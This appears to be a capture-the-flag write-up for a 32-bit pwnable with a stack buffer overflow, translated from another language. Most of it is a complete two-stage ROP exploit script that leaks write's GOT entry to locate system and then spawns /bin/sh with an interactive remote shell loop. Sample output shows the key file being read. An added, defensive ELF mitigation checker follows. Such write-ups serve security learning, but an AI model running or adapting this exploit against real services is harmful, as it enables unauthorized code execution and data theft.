As I recall, the libc file was also provided at the time of the competition.
Back then I didn't know the first thing about pwnables, so I couldn't even touch it, but by now it was reasonably solvable.
The binary was running on the server in daemonized form, and I set up a remote environment on my own server with help from p0p0pret.
The vulnerability is one you can spot 'at a glance': a simple stack-based buffer overflow.
NX and ASLR were both enabled, so a ROP chain had to be used.
The payload is split into Stage 1 and Stage 2: in Stage 1 the GOT entry of write is leaked to obtain the address of system, and in Stage 2 the system function is executed to obtain privileges.
Exploit: http://pastebin.com/1wxt65qn
import os
import struct
import time
from socket import *

def GOT_SHELL(sock):
    # interactive loop: forward each typed command to the remote shell and print the reply
    command = ""
    while command != 'quit':
        command = raw_input("> ")
        sock.send(command + "\n")
        time.sleep(0.5)
        print sock.recv(0x4096)
    return

p = lambda x: struct.pack("<I", x)      # pack a 32-bit little-endian value
up = lambda x: struct.unpack("<I", x)   # unpack a 32-bit little-endian value

ip = "192.168.0.103"
port = 12312    # my server
s = socket(AF_INET, SOCK_STREAM)
s.connect((ip, port))

# write = dfcd0
# system = 41280
OFFSET = 0x9ea50            # write - system in the given libc
freespace = 0x08049629
ppppr = 0x080484b5
write = 0x0804830c
read = 0x0804832c
write_got = 0
system = 0
cmd = "/bin/sh"
sh = 0x0804867f

############################################################################ stage1
payload = ""
payload += "A" * 0x88
payload += "BBBB"
payload += p(write)             # ret
payload += p(ppppr + 1)         # pppr
payload += p(1)                 # stdout
payload += p(0x08049614)        # get write_got
payload += p(4)                 # size
payload += p(read)              # ret
payload += p(ppppr + 1)         # ppr
payload += p(0)
payload += p(freespace)
payload += p(len(cmd))
payload += p(0x0804841d)        # return to vuln function

print "[*] Sending Stage 1 . . ."
s.send(payload)
time.sleep(0.5)
print "[*] Sending Command " + cmd + " . . ."
s.send(cmd)
write_got = up(s.recv(2048))[0]
print "[!] system addr : " + hex(write_got)

############################################################################ stage2
payload = ""
payload += "A" * 0x8c
payload += p(write_got - OFFSET)    # write system
payload += "AAAA"
#payload += p(sh)
payload += p(freespace)
#####################################################################################
print "[*] Sending Stage 2 . . ."
s.send(payload)
GOT_SHELL(s)
raw_input("Got Shell?")

"""
C:\Users\Administrator\Desktop\sweetchip>exploit.py
[*] Sending Stage 1 . . .
[*] Sending Command /bin/sh . . .
[!] system addr : 0xb7649cd0L
[*] Sending Stage 2 . . .
> whoami
sweetchip
> cat /home/sweetchip/key
This is K3y
>
"""
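On the mitigations mentioned above (NX and ASLR on, fixed 0x0804xxxx addresses), here is an added Python 3 checker that is not part of the original write-up or its exploit: it reads the ELF32 program headers to report NX (PT_GNU_STACK without PF_X), PIE (ET_DYN) and RELRO (PT_GNU_RELRO), which is how a defender confirms a build shipped with the stack non-executable and, ideally, PIE and RELRO so that the GOT is neither at a fixed address nor writable. The ELF image it runs on is constructed inline (header plus program headers only) and is not the challenge binary.

```python
import struct

# Program-header types and flags from the ELF32 spec
PT_GNU_STACK = 0x6474E551
PT_GNU_RELRO = 0x6474E552
PF_X = 0x1
ET_DYN = 3

def elf32_mitigations(data):
    """Return {'nx', 'pie', 'relro'} for a little-endian ELF32 image in `data`.
    RELRO is reported as 'none' or 'partial' only: telling full from partial
    RELRO needs DT_BIND_NOW from the dynamic section, which this does not parse."""
    if data[:4] != b"\x7fELF" or data[4] != 1 or data[5] != 1:
        raise ValueError("not a little-endian ELF32 image")
    hdr = struct.unpack_from("<16sHHIIIIIHHHHHH", data, 0)
    e_type, e_phoff, e_phentsize, e_phnum = hdr[1], hdr[5], hdr[9], hdr[10]
    nx = False          # no PT_GNU_STACK at all: the kernel falls back to an executable stack
    relro = "none"
    for i in range(e_phnum):
        ph = struct.unpack_from("<IIIIIIII", data, e_phoff + i * e_phentsize)
        p_type, p_flags = ph[0], ph[6]
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)
        elif p_type == PT_GNU_RELRO:
            relro = "partial"
    return {"nx": nx, "pie": e_type == ET_DYN, "relro": relro}

def build_sample_elf32(stack_flags, relro=True, e_type=2):
    """Constructed minimal ELF32 image (header + program headers only) for this demo."""
    phdrs = [struct.pack("<IIIIIIII", PT_GNU_STACK, 0, 0, 0, 0, 0, stack_flags, 16)]
    if relro:
        phdrs.append(struct.pack("<IIIIIIII", PT_GNU_RELRO, 0, 0, 0, 0, 0, 4, 1))
    ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + b"\x00" * 8   # ELFCLASS32, LSB, version 1
    hdr = struct.pack("<16sHHIIIIIHHHHHH", ident, e_type, 3, 1, 0x08048000,
                      52, 0, 0, 52, 32, len(phdrs), 40, 0, 0)
    return hdr + b"".join(phdrs)

if __name__ == "__main__":
    # NX on, non-PIE (ET_EXEC, fixed addresses as in this binary), partial RELRO
    print(elf32_mitigations(build_sample_elf32(stack_flags=6)))
    # the weak build: executable stack (PF_X set) and no RELRO segment
    print(elf32_mitigations(build_sample_elf32(stack_flags=7, relro=False)))
```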
That's it!